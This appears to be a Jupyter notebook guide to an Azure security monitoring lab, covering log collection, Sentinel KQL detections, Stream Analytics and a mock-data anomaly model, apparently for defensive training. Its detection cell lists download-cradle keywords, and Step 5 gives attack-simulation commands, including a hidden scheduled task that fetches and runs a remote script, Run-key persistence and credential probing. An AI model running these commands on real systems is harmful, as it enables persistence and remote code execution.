# Azure Security Monitoring Lab - Getting Started

This notebook provides an overview of the deployed Azure Security Monitoring & Analytics Lab environment and guides you through initial exploration.

The lab is designed to showcase a modern, scalable architecture for collecting, processing, analyzing, and responding to security telemetry in Azure, utilizing key services like Azure Monitor Agent, Event Hubs, Stream Analytics, Log Analytics, Sentinel, Data Lake Storage, and Synapse Analytics.

## Lab Architecture

The high-level architecture involves multiple components working together for different data flows. Refer to the detailed diagram in the project root:

<img src="architecture_diagram.png" alt="Lab Architecture Diagram" width="150%" height="150%"/>


**Key Principles:**
*   **Azure Monitor Agent (AMA):** Primary collector for VM telemetry (OS logs, security events, performance, Sysmon) sent directly to Log Analytics.
*   **Event Hubs:** Serves as a scalable ingestion point for high-volume logs (e.g., from PaaS diagnostic settings or potentially other forwarders) before they undergo real-time processing.
*   **Stream Analytics:** Provides real-time filtering, enrichment, and detection on the Event Hubs stream, routing data appropriately (e.g., alerts to Log Analytics, raw data to ADLS).
*   **Log Analytics & Sentinel:** Core SIEM for storing curated logs (from AMA & ASA), running KQL-based detections, investigations, and hunting.
*   **ADLS Gen2 & Synapse:** Enables cost-
effective long-term storage and powerful batch analytics/ML capabilities.

## Prerequisites

Before starting this lab, ensure you have:

1. **Azure Subscription:** An active Azure subscription with sufficient permissions (Contributor or Owner recommended).
2. **Local Environment:**
   - Azure CLI installed and logged in (`az login`).
   - PowerShell 5.1+.
   - Git.
   - Python 3.8+ with packages for *this notebook's ML section*: `numpy`, `pandas`, `scikit-learn`, `matplotlib` (`pip install numpy pandas scikit-learn matplotlib`).
3. **Lab Deployed:** You should have successfully run the `Deploy.ps1` script from your local terminal.

## Deployed Components Overview

The `Deploy.ps1` script created the following core components (refer to `architecture_diagram.md` for relationships):

1.  **Resources (Core Infrastructure):**
    *   **Virtual Machine:** Windows Server VM generating logs.
    *   **Networking:** VNet, Subnet, NSG (allowing RDP from your specified IP).
    *   **Event Hubs Namespace & Hub:** For high-volume ingestion path.
    *   **Log Analytics Workspace:** Central store for AMA logs and filtered ASA output.
    *   **Azure Sentinel Instance:** SIEM layer on Log Analytics.
    *   **Azure Stream Analytics Job:** For real-time processing (requires manual configuration/start).
    *   **Azure Data Lake Storage (Gen2):** Storage account for ASA output / Synapse data.
    *   **Azure Synapse Workspace:** For batch analytics (includes Spark pool).
    *   **Key Vault:** Stores secrets (like VM password).
    *   **Managed Identity:** For secure service communication.

2.  **Collection & Configuration:**
    *   **Azure Monitor Agent (AMA):** Automatically installed on the VM.
    *   **Data Collection Rules (DCR):** Deployed via Bicep to configure AMA (Security Events, Perf, Sysmon, File/Registry changes).

In [5]:
# Verify Python Version & Azure CLI accessibility in terminal
# You should have already run 'az login' in your *terminal* before deploying.

import sys
import shutil

print(f"Python Version being used by this notebook kernel: {sys.version}")

# Check if Azure CLI command exists in PATH 
az_path = shutil.which('az')
if az_path:
    print(f"Azure CLI executable found at: {az_path}")
else:
    print("ERROR: Azure CLI command ('az') not found.")

Python Version being used by this notebook kernel: 3.12.2 (tags/v3.12.2:6abddd9, Feb  6 2024, 21:26:36) [MSC v.1937 64 bit (AMD64)]
Azure CLI executable found at: C:\Program Files\Microsoft SDKs\Azure\CLI2\wbin\az.CMD


## Step 1: Deploy Azure Infrastructure (via PowerShell/Terminal)

*(This step should already be completed before running this notebook)*

The lab infrastructure is defined using Azure Bicep and deployed using the `Deploy.ps1` PowerShell script from your local terminal.

**Example Deployment Command Used:**
```powershell
.\Deploy.ps1 -IpAddress "YOUR_PUBLIC_IP"
```

The script handles resource group creation/checking and deploys all components shown in the architecture diagram.

## Step 2: Post-Deployment Verification (Azure Portal & Log Analytics)

After the deployment script finishes successfully (allow 15-30 mins), the Azure Monitor Agent (AMA) on the VM automatically starts collecting logs based on the deployed Data Collection Rules.

**Verify Data Collection in Log Analytics:**

1.  Navigate to the **Log Analytics Workspace** created by the deployment (name based on your prefix) in the Azure Portal.
2.  Go to the **Logs** blade.
3.  Wait 5-10 minutes for initial data ingestion.
4.  Run queries to check for incoming data. Examples:

    *   **Security Events:** `SecurityEvent | count` or `SecurityEvent | take 10`
    *   **Performance Data:** `Perf | where CounterName == "% Processor Time" and InstanceName == "_Total" | take 10`
    *   **Sysmon Events (if enabled):** `Event | where Source == "Microsoft-Windows-Sysmon" | take 10` (Note: Sysmon events might go to the generic `Event` table depending on DCR configuration).

If you don't see data, check the VM's AMA extension status in the Azure Portal under the VM's 'Extensions + applications' blade and review the Data Collection Rules associated with the VM.

## Step 3a: Explore Data & Detections (Log Analytics / Sentinel with KQL)

With AMA sending data to Log Analytics, you can use KQL for exploration, hunting, and creating detection rules in Sentinel.

1.  **Explore Log Analytics:** Use the **Logs** blade in the workspace to run KQL queries against tables like `SecurityEvent`, `Perf`, `Event` (for Sysmon/other logs), etc.
2.  **Configure Sentinel:** Navigate to the **Microsoft Sentinel** instance linked to the workspace.
    *   **Data Connectors:** Verify the 'Windows Security Events via AMA' connector shows as connected and collecting data.
    *   **Analytics:** Explore built-in templates or create custom scheduled query rules using KQL to detect threats based on the collected logs.
    *   **Workbooks:** Use workbooks for visualizing security data.
    *   **Hunting:** Proactively hunt for threats using KQL queries.

In [6]:
# Example KQL query for suspicious process creation (Run in Log Analytics/Sentinel Analytics Rule)
# This query searches the SecurityEvent table (EventID 4688) for suspicious patterns.

example_kql = '''\
// Detect suspicious process creations involving common LOLBINs and keywords
// Source: SecurityEvent (EventID 4688)
let lolbins = dynamic(["powershell.exe", "cmd.exe", "wmic.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"]);
let suspiciousKeywords = dynamic(["base64", "hidden", "downloadstring", "bypass", "-enc", "webclient", "invoke-expression", "iex", "schtasks", "-w hidden", "-nop", "-noni"]);
SecurityEvent
| where EventID == 4688 // Process Creation
| parse kind=relaxed CommandLine with * "-enc" encodedCommand // Simple parse for encoded commands
| extend Proc = tostring(NewProcessName),
         ParentProc = tostring(ParentProcessName),
         Cmd = tostring(CommandLine)
| where (Proc has_any (lolbins) and Cmd has_any (suspiciousKeywords))
        or (isnotempty(encodedCommand))
        or (Proc has "schtasks.exe" and Cmd has_any("powershell", "cmd.exe", "http:", "https:")) // Task creation with download/execution
| project TimeGenerated, Computer, SubjectUserName, ParentProc, Proc, Cmd, encodedCommand
| sort by TimeGenerated desc
'''

print("Example KQL query for detecting suspicious processes (run in Log Analytics or Sentinel):")
print(example_kql)

Example KQL query for detecting suspicious processes (run in Log Analytics or Sentinel):
// Detect suspicious process creations involving common LOLBINs and keywords
// Source: SecurityEvent (EventID 4688)
let lolbins = dynamic(["powershell.exe", "cmd.exe", "wmic.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe"]);
let suspiciousKeywords = dynamic(["base64", "hidden", "downloadstring", "bypass", "-enc", "webclient", "invoke-expression", "iex", "schtasks", "-w hidden", "-nop", "-noni"]);
SecurityEvent
| where EventID == 4688 // Process Creation
| parse kind=relaxed CommandLine with * "-enc" encodedCommand // Simple parse for encoded commands
| extend Proc = tostring(NewProcessName),
         ParentProc = tostring(ParentProcessName),
         Cmd = tostring(CommandLine)
| where (Proc has_any (lolbins) and Cmd has_any (suspiciousKeywords))
        or (isnotempty(encodedCommand))
        or (Proc has "schtasks.exe" and Cmd has_any("powershell", "cmd.exe", "

## Step 3b: Configure Real-Time Filtering/Detections (Azure Stream Analytics)

This is an **optional** step if you plan to use the Event Hubs path (e.g., by configuring Diagnostic Settings on PaaS resources to send to Event Hubs). The ASA job is deployed but **not started** and requires configuration.

**Purpose:** Use ASA to process high-volume streams from Event Hubs *before* they hit Log Analytics or long-term storage. Useful for:
*   Filtering out noisy or low-value events to save Log Analytics ingestion costs.
*   Enriching events with contextual data in real-time.
*   Performing simple, low-latency detections directly on the stream.
*   Routing different types of events to different destinations (e.g., alerts to LA, raw to ADLS).

**Configuration Steps (Azure Portal):**

1.  **Navigate to the ASA Job:** Find the deployed Stream Analytics job.
2.  **Configure Inputs:** Add an 'Event Hub' input, pointing to the deployed Event Hubs namespace and hub (e.g., `endpoint-logs`). Give it an alias (e.g., `rawStreamInput`). Use Managed Identity for authentication.
3.  **Configure Outputs:** Add outputs as needed:
    *   **Log Analytics:** To send filtered/alerted events to a custom table in the workspace.
    *   **Blob Storage / ADLS Gen2:** To archive raw or processed data.
    *   **Another Event Hub:** To chain processing.
    *   Give outputs aliases (e.g., `filteredToLA`, `archiveToADLS`).
4.  **Write the Query:** Use ASA's SQL-like query language. Read from the input alias, apply `WHERE` clauses for filtering or `SELECT` transformations, and send results `INTO` your output aliases.
5.  **Start the Job:** Once configured, start the ASA job.

In [7]:
# Example Azure Stream Analytics query (Write this in the ASA Job Query Editor in Azure portal)
# This example assumes logs coming into Event Hub follow a structure with 'Level' and 'EventID'.

example_asa_query = '''
-- Input Alias: rawStreamInput
-- Output Alias 1: filteredToLA (Log Analytics)
-- Output Alias 2: archiveToADLS (ADLS Gen2)

WITH ParsedEvents AS (
    SELECT 
        System.Timestamp AS EventTime, 
        GetRecordPropertyValue(EventData, 'Level') AS LogLevel, 
        GetRecordPropertyValue(EventData, 'Computer') AS ComputerName,
        GetRecordPropertyValue(EventData, 'ProviderName') AS ProviderName,
        GetRecordPropertyValue(EventData, 'EventID') AS EventID,
        EventData -- Keep the original record
    FROM 
        rawStreamInput -- Read from Event Hub input
)

-- Send only Warning (3) and Error (2) level events to Log Analytics
SELECT EventTime, LogLevel, ComputerName, ProviderName, EventID, EventData
INTO filteredToLA
FROM ParsedEvents
WHERE LogLevel <= 3 

-- Send ALL events to ADLS for archival
SELECT *
INTO archiveToADLS
FROM ParsedEvents
'''

print("Example Azure Stream Analytics Query (Configure in Azure Portal):")
print(example_asa_query)

Example Azure Stream Analytics Query (Configure in Azure Portal):

-- Input Alias: rawStreamInput
-- Output Alias 1: filteredToLA (Log Analytics)
-- Output Alias 2: archiveToADLS (ADLS Gen2)

WITH ParsedEvents AS (
    SELECT 
        System.Timestamp AS EventTime, 
        GetRecordPropertyValue(EventData, 'Level') AS LogLevel, 
        GetRecordPropertyValue(EventData, 'Computer') AS ComputerName,
        GetRecordPropertyValue(EventData, 'ProviderName') AS ProviderName,
        GetRecordPropertyValue(EventData, 'EventID') AS EventID,
        EventData -- Keep the original record
    FROM 
        rawStreamInput -- Read from Event Hub input
)

SELECT EventTime, LogLevel, ComputerName, ProviderName, EventID, EventData
INTO filteredToLA
FROM ParsedEvents
WHERE LogLevel <= 3 

-- Send ALL events to ADLS for archival
SELECT *
INTO archiveToADLS
FROM ParsedEvents



## Step 4: Batch Analytics & Anomaly Detection (Azure Synapse / ML Example)

This lab includes Azure Synapse Analytics for advanced batch processing, data warehousing, and ML tasks on large volumes of security data, typically sourced from ADLS Gen2.

**Example Use Cases:**
*   Training ML models (like the Isolation Forest below) on larger historical datasets stored in ADLS.
*   Performing complex ETL (Extract, Transform, Load) on logs.
*   Joining security data with threat intelligence feeds or asset inventories.
*   Running scheduled Spark jobs for periodic baseline analysis or anomaly detection.

This section demonstrates a *basic* ML anomaly detection example using **mock data** within this notebook. For real-world use, you would typically run such analysis within the Synapse environment using Spark notebooks against data in the linked ADLS account.

**Note:** Ensure you have `scikit-learn`, `pandas`, `numpy`, and `matplotlib` installed (`pip install scikit-learn pandas numpy matplotlib`).

In [8]:
# Example code for a simple anomaly detection model using Python (runnable in this notebook)
# In a real scenario, adapt this logic for a Synapse Spark notebook reading from ADLS.

import numpy as np
import pandas as pd
from sklearn.ensemble import IsolationForest
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore", category=UserWarning) # Suppress potential UserWarnings from plot libs

def load_mock_login_data(num_normal=190, num_anomaly=10):
    """Generate mock login data for demonstration"""
    np.random.seed(42)
    normal_hours = np.random.randint(8, 18, num_normal)
    normal_days = np.random.randint(0, 5, num_normal)
    anomaly_hours = np.random.choice([np.random.randint(0, 8), np.random.randint(18, 24)], num_anomaly)
    anomaly_days = np.random.randint(5, 7, num_anomaly)
    hours = np.concatenate([normal_hours, anomaly_hours])
    days = np.concatenate([normal_days, anomaly_days])
    df = pd.DataFrame({'login_hour': hours, 'day_of_week': days})
    return df

# Load mock data
mock_data = load_mock_login_data()
X = mock_data[['login_hour', 'day_of_week']]

# Train Isolation Forest
model = IsolationForest(n_estimators=100, contamination='auto', random_state=42)
model.fit(X)

# Predict anomalies (-1 for anomalies, 1 for normal)
mock_data['predicted_anomaly'] = model.predict(X)

# Visualize
plt.figure(figsize=(10, 6))
normal = mock_data[mock_data['predicted_anomaly'] == 1]
anomaly = mock_data[mock_data['predicted_anomaly'] == -1]
plt.scatter(normal['login_hour'], normal['day_of_week'], c='blue', label='Normal', alpha=0.6)
plt.scatter(anomaly['login_hour'], anomaly['day_of_week'], c='red', label='Anomaly', marker='x', s=100)
xx, yy = np.meshgrid(np.linspace(X['login_hour'].min()-1, X['login_hour'].max()+1, 50), np.linspace(X['day_of_week'].min()-1, X['day_of_week'].max()+1, 50))
Z = model.decision_function(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
plt.contour(xx, yy, Z, levels=[0], linewidths=2, colors='black')
plt.contourf(xx, yy, Z, cmap=plt.cm.Blues_r, alpha=0.3)
plt.title('Anomaly Detection using Isolation Forest (Mock Login Data)')
plt.xlabel('Login Hour of Day')
plt.ylabel('Day of Week (0=Mon, 6=Sun)')
plt.legend()
plt.grid(True)
plt.show()

ModuleNotFoundError: No module named 'numpy'

## Step 5: Testing Detections (Generate Events on VM)

To test your detection rules (KQL in Sentinel, or ASA queries), you need events generated on the deployed VM. Run the following commands in a **PowerShell prompt on the VM** (connect via RDP using its Public IP) to simulate potentially suspicious activities. These events should be collected by AMA and appear in Log Analytics.

**Important:** Only run these on the lab VM.

In [None]:
# Example commands to run on the deployed Windows VM to generate test events

test_commands = '''
echo "--- Simulating Potentially Malicious Activity ---"

# --- Mimic Reconnaissance ---
echo "Running basic system info commands..."
whoami ; ipconfig /all ; systeminfo | findstr /B /C:"OS Name" /C:"OS Version" ; net user ; net localgroup administrators
echo "Enumerating running processes..."
tasklist
echo "Checking network connections..."
netstat -ano

# --- Mimic Execution / LOLBINs ---
echo "Running PowerShell encoded command..."
$cmd = 'Write-Host "PS Encoded Test"' ; $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd) ; $encoded = [Convert]::ToBase64String($bytes) ; powershell.exe -Enc $encoded
echo "Using certutil to download (harmless example)..."
certutil -urlcache -split -f https://raw.githubusercontent.com/PowerShell/PowerShell/master/LICENSE.txt C:\Windows\Temp\pstest.txt
echo "Running wmic process call create..."
wmic process call create "notepad.exe"

# --- Mimic Persistence ---
echo "Creating suspicious scheduled task (will likely fail)..." ; schtasks /create /tn "MalwareUpdate" /tr "powershell.exe -nop -w hidden -c 'iex ((new-object net.webclient).downloadstring(''http://1.2.3.4/update.ps1''))'" /sc DAILY /st 03:00 /F /RL HIGHEST
echo "Adding Run key persistence (requires admin prompt)..." ; reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "MalwareUpdater" /t REG_SZ /d "C:\Windows\Temp\updater.exe" /f

# --- Mimic Credential Access ---
echo "Attempting failed logins..." ; for /L %i in (1,1,5) do @net use \\\\localhost\C$ /user:fakeuser wrongpassword
echo "Querying sensitive registry key (LSA - requires monitoring)..." ; reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa"
'''

print("Example commands to generate security events for testing (COPY AND RUN ON THE DEPLOYED VM):")
print(test_commands)

## Step 6: Clean-up Resources

When you are finished with the lab, **ensure you delete the deployed resources** to avoid incurring unnecessary Azure costs. Use the Azure CLI command below in your **local terminal** where you are logged in to Azure.

**Warning:** This command permanently deletes the entire resource group and all resources created within it.

In [None]:
# Command to clean up resources (Run in local PowerShell/terminal)

# IMPORTANT: Replace 'MalwareLab' if your final resource group name was different 
# (e.g., due to the timestamp logic if the original group wasn't empty)
# Check the deployment output or Azure portal for the exact resource group name.
resource_group_name = "MalwareLab" # <-- VERIFY THIS NAME

print(f"\nResource cleanup command (RUN IN LOCAL PowerShell/TERMINAL):")
print("#-----------------------------------------------------")
print(f"# WARNING: This will permanently delete '{resource_group_name}'")
print(f"az group delete --name {resource_group_name} --yes --no-wait") 
print("#-----------------------------------------------------")

## Conclusion

This lab provides a platform to gain hands-on experience with a comprehensive Azure security monitoring architecture, including:

- Infrastructure deployment and automation (Bicep, PowerShell scripting).
- VM Telemetry collection via Azure Monitor Agent (AMA) and Data Collection Rules.
- High-volume data ingestion and routing using Event Hubs.
- Real-time filtering and detection with Stream Analytics.
- SIEM capabilities with Log Analytics and Microsoft Sentinel (KQL-based analysis).
- Long-term archival and batch processing using ADLS Gen2 and Azure Synapse Analytics.
- Secure credential management (Key Vault, Managed Identities).

Use the deployed environment to experiment with KQL queries, Sentinel rules, ASA queries, Synapse notebooks, and configuring diagnostic settings to understand how these services work together.